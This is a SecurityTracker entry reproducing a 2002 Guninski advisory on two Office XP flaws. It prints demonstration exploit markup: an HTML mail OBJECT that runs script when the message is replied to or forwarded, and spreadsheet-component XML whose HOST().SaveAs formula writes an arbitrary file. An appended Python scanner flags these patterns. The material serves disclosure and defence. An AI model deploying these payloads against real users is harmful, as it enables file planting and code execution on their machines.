SecurityTracker.com
Category:   Application (Game)  >   Microsoft Office
Vendors:   Microsoft
Microsoft Office XP Active Content Bug Lets Remote Users Cause Code to Be Executed on an Office User's Computer
SecurityTracker Alert ID:  1003932
SecurityTracker URL:  http://securitytracker.com/id/1003932
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 31 2002
Impact:   Execution of arbitrary code via network, Modification of system information, User access via network
Exploit Included:  Yes  
Version(s): Office XP
Description:   Two vulnerabilities were reported in Microsoft Office XP. A remote user can cause code to be executed on an Office user's computer with the full privileges of the Office user.

A remote user can reportedly embed active content (object + script) in an HTML-based e-mail message so that the code will be executed if the recipient chooses to reply to or forward the e-mail message. The code could reportedly be used to force the recipient to visit a malicious web page.

A vulnerability reportedly also exists in the Microsoft spreadsheet component of Office XP. A remote user can exploit a bug in the Host() function to create files on the system with arbitrary file names and with certain content. The content can reportedly be specified to an extent that is sufficient to place an executable file (.hta) in the target (victim) user's startup directory. This allows the remote user to take full control of the target user's host when the computer is rebooted.

Some demonstration exploit code is provided in the Source Message.

The vendor has reportedly been notified.

Impact:   A remote user can send HTML-based e-mail that, when forwarded or replied to, will cause arbitrary scripting to be executed on the target user's computer. A remote user can also send an Office XP document to a target user that, when opened by the target user, will cause a file with specific contents and an arbitrary file name to be created on the target user's computer.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/
Cause:   Access control error
Underlying OS:  Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  More Office XP problems


Georgi Guninski security advisory #53, 2002

More Office XP problems

Systems affected:
Office XP

Risk: High
Date: 31 March 2002

Legal Notice:
This Advisory is Copyright (c) 2002 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission.
If you link to this content use the URL:
http://www.guninski.com/m$oxp-2.html

Disclaimer:
The information in this advisory is believed to be true though
it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or  indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.

Description:
Actually there are at least two vulnerabilities in Office XP.
1. It is possible to embed active content (object + script) in HTML mail
which is triggered if the user chooses reply or forward to the mail.
This opens an exploit scenario for forcing the user to visit a page
in the internet zone of IE at least. For another exploit scenario
check (2)
2. There is a bug in ms spreadsheet component. Namely in its Host()
function which may be exploited with the help of (1) or probably from
any document opened with Office application. This buggy function
allows creating files with arbitrary names and their content may be
specified to some extent at which is sufficient to place an
executable file (.hta) in user's startup directory which may lead to
taking full control over user's computer.
This probably may be called cross application scripting because
one application uses object from another application.


Details:
The following must be put in HTML email which should be opened with
Outlook XP and the user should choose reply or forward.

1.
--------------------------------------
<OBJECT id=WebBrowser1 height=150 width=300
classid=CLSID:8856F961-340A-11D0-A96B-00C04FD705A2>
<PARAM NAME="ExtentX" VALUE="7938">
<PARAM NAME="ExtentY" VALUE="3969">
<PARAM NAME="ViewMode" VALUE="0">
<PARAM NAME="Offline" VALUE="0">
<PARAM NAME="Silent" VALUE="0">
<PARAM NAME="RegisterAsBrowser" VALUE="1">
<PARAM NAME="RegisterAsDropTarget" VALUE="1">
<PARAM NAME="AutoArrange" VALUE="0">
<PARAM NAME="NoClientEdge" VALUE="0">
<PARAM NAME="AlignLeft" VALUE="0">
<PARAM NAME="ViewID" VALUE="{0057D0E0-3573-11CF-AE69-08002B2E1262}">
<PARAM NAME="Location" VALUE="about:/dev/random&lt;script&gt;while (42) alert('HOHOHO\nTrying to sell trustworthy
computing\nHOHOHO')&lt;/script&gt;">
<PARAM NAME="ReadyState" VALUE="4">
</OBJECT>
-------------------------------------


2.
The office spreadsheet component is something like mini excel.
It may be embedded in web pages (seems not exploitable) and in
office documents (seems exploitable).
It supports the Host() function which returns the hosting object.
So if you put in formula '=Host().SaveAs("name")' file with name
shall be created.

[Note, lines may be wrapped]
---------------------------------------
<h1>
Hehe. Triyng to sell trustworthy computing.
</h1>
<object
     classid="CLSID:0002E551-0000-0000-C000-000000000046" id=Spreadsheet1
     v:shapes="_x0000_s1026" class=shape width=81 height=81
     u1:shapes="_x0000_s1025">
     <param name=DataType value=XMLURL>
     <param name=XMLData
     value="&lt;?xml version=&quot;1.0&quot;?&gt;&#13;&#10;&lt;ss:Workbook
xmlns:o=&quot;urn:schemas-microsoft-com:office:office&quot;&#13;&#10; xmlns:x=&quot;urn:schemas-microsoft-com:office:excel&quot;&#13;&#10;
xmlns:ss=&quot;urn:schemas-microsoft-com:office:spreadsheet&quot;&#13;&#10;
xmlns:c=&quot;urn:schemas-microsoft-com:office:component:spreadsheet&quot;&#13;&#10;
xmlns:html=&quot;http://www.w3.org/TR/REC-html40&quot;&gt;&#13;&#10; &lt;x:ExcelWorkbook&gt;&#13;&#10;
&lt;x:ProtectStructure&gt;False&lt;/x:ProtectStructure&gt;&#13;&#10;  &lt;x:ActiveSheet&gt;0&lt;/x:ActiveSheet&gt;&#13;&#10;
&lt;/x:ExcelWorkbook&gt;&#13;&#10; &lt;ss:Styles&gt;&#13;&#10;  &lt;ss:Style ss:ID=&quot;Default&quot;&gt;&#13;&#10;   &lt;ss:Alignment
ss:Horizontal=&quot;Automatic&quot; ss:Rotate=&quot;0.0&quot; ss:Vertical=&quot;Bottom&quot;&#13;&#10;
ss:ReadingOrder=&quot;Context&quot;/&gt;&#13;&#10;   &lt;ss:Borders&gt;&#13;&#10;   &lt;/ss:Borders&gt;&#13;&#10;   &lt;ss:Font
ss:FontName=&quot;Arial&quot; ss:Size=&quot;10&quot; ss:Color=&quot;Automatic&quot; ss:Bold=&quot;0&quot;&#13;&#10;
ss:Italic=&quot;0&quot; ss:Underline=&quot;None&quot;/&gt;&#13;&#10;   &lt;ss:Interior ss:Color=&quot;Automatic&quot;
ss:Pattern=&quot;None&quot;/&gt;&#13;&#10;   &lt;ss:NumberFormat ss:Format=&quot;General&quot;/&gt;&#13;&#10;   &lt;ss:Protection
ss:Protected=&quot;1&quot;/&gt;&#13;&#10;  &lt;/ss:Style&gt;&#13;&#10; &lt;/ss:Styles&gt;&#13;&#10; &lt;c:ComponentOptions&gt;&#13;&#10;
&lt;c:Label&gt;&#13;&#10;   &lt;c:Caption&gt;Microsoft Office Spreadsheet&lt;/c:Caption&gt;&#13;&#10;  &lt;/c:Label&gt;&#13;&#10;
&lt;c:PreventPropBrowser/&gt;&#13;&#10;  &lt;c:MaxHeight&gt;80%&lt;/c:MaxHeight&gt;&#13;&#10;
&lt;c:MaxWidth&gt;80%&lt;/c:MaxWidth&gt;&#13;&#10;  &lt;c:NextSheetNumber&gt;1&lt;/c:NextSheetNumber&gt;&#13;&#10;
&lt;/c:ComponentOptions&gt;&#13;&#10; &lt;x:WorkbookOptions&gt;&#13;&#10;  &lt;c:OWCVersion&gt;10.0.0.2621
&lt;/c:OWCVersion&gt;&#13;&#10;  &lt;x:DisableUndo/&gt;&#13;&#10; &lt;/x:WorkbookOptions&gt;&#13;&#10; &lt;ss:Worksheet
ss:Name=&quot;Sheet1&quot;&gt;&#13;&#10;  &lt;x:WorksheetOptions&gt;&#13;&#10;   &lt;x:Selected/&gt;&#13;&#10;
&lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;&#13;&#10;   &lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;&#13;&#10;
&lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;&#13;&#10;   &lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;&#13;&#10;
&lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;&#13;&#10;  &lt;/x:WorksheetOptions&gt;&#13;&#10;
&lt;c:WorksheetOptions&gt;&#13;&#10;  &lt;/c:WorksheetOptions&gt;&#13;&#10;  &lt;ss:Table ss:ExpandedColumnCount=&quot;1&quot;
ss:ExpandedRowCount=&quot;1&quot;&#13;&#10;   ss:DefaultColumnWidth=&quot;48.0&quot; ss:DefaultRowHeight=&quot;12.75&quot;&gt;&#13;&#10;
&lt;ss:Row&gt;&#13;&#10;    &lt;ss:Cell ss:Formula='=HOST().SaveAs(&quot;C:\GGGG5&quot;)'&gt;&#13;&#10;     &lt;ss:Data
ss:Type=&quot;Boolean&quot;&gt;1&lt;/ss:Data&gt;&#13;&#10;    &lt;/ss:Cell&gt;&#13;&#10;   &lt;/ss:Row&gt;&#13;&#10;
&lt;/ss:Table&gt;&#13;&#10; &lt;/ss:Worksheet&gt;&#13;&#10; &lt;ss:Worksheet ss:Name=&quot;Sheet2&quot;&gt;&#13;&#10;
&lt;x:WorksheetOptions&gt;&#13;&#10;   &lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;&#13;&#10;
&lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;&#13;&#10;   &lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;&#13;&#10;
&lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;&#13;&#10;   &lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;&#13;&#10;
&lt;/x:WorksheetOptions&gt;&#13;&#10;  &lt;c:WorksheetOptions&gt;&#13;&#10;  &lt;/c:WorksheetOptions&gt;&#13;&#10;
&lt;/ss:Worksheet&gt;&#13;&#10; &lt;ss:Worksheet ss:Name=&quot;Sheet3&quot;&gt;&#13;&#10;  &lt;x:WorksheetOptions&gt;&#13;&#10;
&lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;&#13;&#10;   &lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;&#13;&#10;
&lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;&#13;&#10;   &lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;&#13;&#10;
&lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;&#13;&#10;  &lt;/x:WorksheetOptions&gt;&#13;&#10;
&lt;c:WorksheetOptions&gt;&#13;&#10;  &lt;/c:WorksheetOptions&gt;&#13;&#10; &lt;/ss:Worksheet&gt;&#13;&#10;
&lt;o:DocumentProperties&gt;&#13;&#10;   &lt;o:Author&gt;ad&lt;/o:Author&gt;&#13;&#10;
&lt;o:LastAuthor&gt;ad&lt;/o:LastAuthor&gt;&#13;&#10;   &lt;o:Created&gt;2002-03-17T12:07:37Z&lt;/o:Created&gt;&#13;&#10;
&lt;o:Company&gt;g&lt;/o:Company&gt;&#13;&#10;   &lt;o:Version&gt;10.2625&lt;/o:Version&gt;&#13;&#10;
&lt;/o:DocumentProperties&gt;&#13;&#10;  &lt;o:OfficeDocumentSettings&gt;&#13;&#10;   &lt;o:DownloadComponents/&gt;&#13;&#10;
&lt;o:LocationOfComponents HRef=&quot;file:///E:\&quot;/&gt;&#13;&#10;
&lt;/o:OfficeDocumentSettings&gt;&#13;&#10;&lt;/ss:Workbook&gt;&#13;&#10;">
     <param name=AllowPropertyToolbox value=0>
     <param name=AutoFit value=0>
     <param name=Calculation value=-4105>
     <param name=Caption value="Microsoft Office Spreadsheet">
     <param name=DisplayColumnHeadings value=-1>
     <param name=DisplayGridlines value=-1>
     <param name=DisplayHorizontalScrollBar value=-1>
     <param name=DisplayOfficeLogo value=-1>
     <param name=DisplayPropertyToolbox value=0>
     <param name=DisplayRowHeadings value=-1>
     <param name=DisplayTitleBar value=0>
     <param name=DisplayToolbar value=-1>
     <param name=DisplayVerticalScrollBar value=-1>
     <param name=DisplayWorkbookTabs value=-1>
     <param name=EnableEvents value=-1>
     <param name=MaxHeight value="80%">
     <param name=MaxWidth value="80%">
     <param name=MoveAfterReturn value=-1>
     <param name=MoveAfterReturnDirection value=-4121>
     <param name=RightToLeft value=0>
     <param name=ScreenUpdating value=-1>
     <param name=EnableUndo value=0>
    </object>
---------------------------------

Workaround/Solution:
The solution is to get a real mail client and office applications.
Workaround for this particular problem is:
For (1) - disable everything that contains "active" in IE.
For (2) - (Have not tested it personally)
Deregister and delete the ms office spreadsheet component

Vendor status:

Microsoft was notified on 17 March 2002.
They had 2 weeks to produce a patch but didn't.

Regards,
Georgi Guninski
http://www.guninski.com






----------------------
You may visit Guninski Security Mailing List page at
http://www.guninski.com/mailinglist.html
----------------------
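
A defensive check built on the two demonstrations in the advisory, added here as an example and not part of the advisory or the SecurityTracker entry: it parses an HTML mail body or document, flags OBJECT tags carrying either CLSID quoted above, and reports HOST().SaveAs("...") formulas or script markup inside their PARAM values. The names ObjectScanner and scan_html, the finding labels and the sample input are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# CLSIDs taken from the two <OBJECT> tags shown in the advisory.
FLAGGED_CLSIDS = {
    "8856F961-340A-11D0-A96B-00C04FD705A2": "WebBrowser control",
    "0002E551-0000-0000-C000-000000000046": "Office spreadsheet component",
}
# Formula shape described in the advisory: =Host().SaveAs("name")
SAVEAS_RE = re.compile(r'HOST\s*\(\s*\)\s*\.\s*SaveAs\s*\(\s*"([^"]*)"', re.I)
SCRIPT_RE = re.compile(r"<\s*script\b", re.I)
# Constructed sample input (shortened, with a placeholder file name).
SAMPLE = r'''<object classid="CLSID:0002E551-0000-0000-C000-000000000046" id=s1>
<param name=XMLData value="&lt;ss:Cell ss:Formula='=HOST().SaveAs(&quot;C:\example.txt&quot;)'&gt;">
</object>'''


class ObjectScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []   # (kind, component, detail) tuples
        self.current = None  # label of the flagged object we are inside, if any

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}
        if tag == "object":
            clsid = attrs.get("classid", "").upper().removeprefix("CLSID:").strip("{} ")
            self.current = FLAGGED_CLSIDS.get(clsid)
            if self.current:
                self.findings.append(("object", self.current, clsid))
        elif tag == "param" and self.current:
            value = attrs.get("value", "")  # the parser has already decoded entities
            for m in SAVEAS_RE.finditer(value):
                self.findings.append(("saveas", self.current, m.group(1)))
            if SCRIPT_RE.search(value):
                self.findings.append(("script-in-param", self.current, attrs.get("name", "")))

    def handle_endtag(self, tag):
        if tag == "object":
            self.current = None


def scan_html(body: str):
    """Return findings for one HTML mail body or HTML-format Office document."""
    scanner = ObjectScanner()
    scanner.feed(body)
    scanner.close()
    return scanner.findings
```

Because the parser decodes character references before the patterns run, the entity-encoded form used in the XMLData parameter is matched the same way as plain text.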


 
 


Copyright 2019, SecurityGlobal.net LLC